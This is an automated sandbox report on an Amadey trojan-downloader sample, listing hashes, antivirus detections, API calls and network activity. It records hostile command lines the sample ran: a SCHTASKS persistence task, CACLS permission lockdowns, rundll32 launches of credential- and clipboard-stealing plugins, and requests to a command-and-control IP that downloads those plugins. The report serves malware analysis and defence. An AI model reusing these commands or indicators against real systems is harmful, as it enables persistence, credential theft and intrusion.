Summary | ZeroBOX

csrsv.exe

Tags: Ave Maria WARZONE RAT, UPX, Admin Tool (Sysinternals etc ...), Malicious Library, Malicious Packer, PE64, DLL, OS Processor Check, JPEG Format, PE32, PE File
Category FILE
Machine s1_win7_x6402
Started May 17, 2023, 9:31 a.m.
Completed May 17, 2023, 9:33 a.m.
Size 211.5KB
Type PE32 executable (GUI) Intel 80386, for MS Windows
MD5 13c6b003e4cd8319299a50a51e14a222
SHA256 28f5e5e43a67a48c6a41f9814a50b6faf5d20dfee6b17e867429efca82394681
CRC32 A8C8C3B9
ssdeep 6144:tWh1VL9EWeJanEYL7OuuT7Ujz41FiPRL:tg1VdSYL3uT7e0KF
PDB Path D:\Mktmp\Amadey\Release\Amadey.pdb
Yara
  • UPX_Zero - UPX packed file
  • OS_Processor_Check_Zero - OS Processor Check
  • Malicious_Library_Zero - Malicious_Library
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)
  • Malicious_Packer_Zero - Malicious Packer

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
95.214.26.53 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: SUCCESS: The scheduled task "oneetx.exe" has successfully been created.
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: Y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: N
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: p
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: c
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: d
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: f
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: i
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: l
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: A
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: e
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: y
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: o
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: s
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: u
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0
pdb_path D:\Mktmp\Amadey\Release\Amadey.pdb
file C:\Program Files\Mozilla Firefox\firefox.exe
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
Save+0x8d733 Main-0x1478d cred64+0x91b73 @ 0x7fef2b51b73
Save+0x8f34b Main-0x12b75 cred64+0x9378b @ 0x7fef2b5378b
Save+0x903d3 Main-0x11aed cred64+0x94813 @ 0x7fef2b54813
Save+0x9077f Main-0x11741 cred64+0x94bbf @ 0x7fef2b54bbf
Save+0xa18a8 Main-0x618 cred64+0xa5ce8 @ 0x7fef2b65ce8
Main+0x65 cred64+0xa6365 @ 0x7fef2b66365
rundll32+0x2f42 @ 0xff312f42
rundll32+0x3b7a @ 0xff313b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x7718652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x772bc521

exception.instruction_r: 42 38 3c 00 75 f7 48 8b d0 48 8d 4c 24 50 e8 fa
exception.instruction: cmp byte ptr [rax + r8], dil
exception.exception_code: 0xc0000005
exception.symbol: Save+0x8d733 Main-0x1478d cred64+0x91b73
exception.address: 0x7fef2b51b73
registers.r14: 0
registers.r15: 0
registers.rcx: 1099511627775
registers.rsi: 0
registers.r10: 17
registers.rbx: 0
registers.rsp: 1374720
registers.r11: 1369616
registers.r8: 0
registers.r9: 257711013897
registers.rdx: 3454000
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 1
registers.r13: 0
1 0 0
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
suspicious_features POST method with no referer header, POST method with no useragent header, Connection to IP address suspicious_request POST http://95.214.26.53/J84hHFuefh2/index.php
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll
request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
request POST http://95.214.26.53/J84hHFuefh2/index.php
request GET http://95.214.26.53/J84hHFuefh2/Plugins/cred64.dll
request GET http://95.214.26.53/J84hHFuefh2/Plugins/clip64.dll
request POST http://95.214.26.53/J84hHFuefh2/index.php?scr=1
request POST http://95.214.26.53/J84hHFuefh2/index.php
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3044
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f62000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3044
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00c10000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 1236
region_size: 65536
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000007390000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 1184
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2636
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000007fefa1b7000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x7398f000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x746a0000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d61000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73cd1000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73c21000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73d62000
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2484
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x739a1000
process_handle: 0xffffffff
1 0 0
description oneetx.exe tried to sleep 141 seconds, actually delayed analysis time by 141 seconds
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\cred64.dll
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline C:\Windows\system32\cmd.exe /S /D /c" echo Y"
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
file C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
file C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
file C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
parameters:
filepath: C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: SCHTASKS
parameters: /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
filepath: SCHTASKS
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
filepath: cmd
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\27d75989acd3e0\cred64.dll, Main
filepath: rundll32.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: rundll32.exe
parameters: C:\Users\test22\AppData\Roaming\27d75989acd3e0\clip64.dll, Main
filepath: rundll32.exe
1 1 0
Time & API Arguments Status Return Repeated

InternetReadFile

buffer: (PE image bytes; raw multi-line binary dump omitted)
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: (PE image bytes; raw multi-line binary dump omitted)
request_handle: 0x00cc000c
1 1 0
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
host 95.214.26.53
file C:\ProgramData\AVAST Software
file C:\ProgramData\Avira
file C:\ProgramData\Kaspersky Lab
file C:\ProgramData\Panda Security
file C:\ProgramData\Bitdefender
file C:\ProgramData\AVG
file C:\ProgramData\Doctor Web
cmdline SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\6fd2e6071d\oneetx.exe" /F
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline CACLS "..\6fd2e6071d" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\6fd2e6071d" /P "test22:N"&&CACLS "..\6fd2e6071d" /P "test22:R" /E&&Exit
cmdline CACLS "..\6fd2e6071d" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:R" /E
cmdline CACLS "oneetx.exe" /P "test22:N"
Bkav W32.AIDetectMalware
Elastic malicious (high confidence)
MicroWorld-eScan Gen:Variant.Barys.321153
McAfee Downloader-FCND!13C6B003E4CD
Cylance unsafe
Sangfor Trojan.Win32.Save.a
Cybereason malicious.3e4cd8
Arcabit Trojan.Barys.D4E681
BitDefenderTheta Gen:NN.ZexaF.36196.nuW@aWbUXkfi
Symantec ML.Attribute.HighConfidence
ESET-NOD32 a variant of Win32/TrojanDownloader.Amadey.A
Cynet Malicious (score: 100)
APEX Malicious
ClamAV Win.Malware.Doina-10001799-0
Kaspersky UDS:Trojan-Downloader.Win32.Deyma.gen
BitDefender Gen:Variant.Barys.321153
Avast Win32:BotX-gen [Trj]
Tencent Win32.Trojan.Agen.Ktgl
Emsisoft Gen:Variant.Barys.321153 (B)
F-Secure Heuristic.HEUR/AGEN.1319380
VIPRE Gen:Variant.Barys.321153
McAfee-GW-Edition BehavesLike.Win32.Downloader.dh
FireEye Generic.mg.13c6b003e4cd8319
Sophos Mal/Generic-R
SentinelOne Static AI - Malicious PE
Avira HEUR/AGEN.1319380
Microsoft Trojan:Win32/Amadey.AY!MTB
ZoneAlarm UDS:Trojan-Downloader.Win32.Deyma.gen
GData Gen:Variant.Barys.321153
Google Detected
AhnLab-V3 Malware/Win.Trojanspy.C5238800
ALYac Gen:Variant.Barys.321153
MAX malware (ai score=83)
Panda Trj/GdSda.A
Rising Trojan.Generic@AI.100 (RDML:1sWZhubuURj7J4Ghb6pcQw)
Ikarus Trojan-Downloader.Win32.Amadey
MaxSecure Trojan.Malware.121218.susgen
Fortinet W32/Injector.EGTS!tr
AVG Win32:BotX-gen [Trj]
DeepInstinct MALICIOUS
CrowdStrike win/malicious_confidence_100% (W)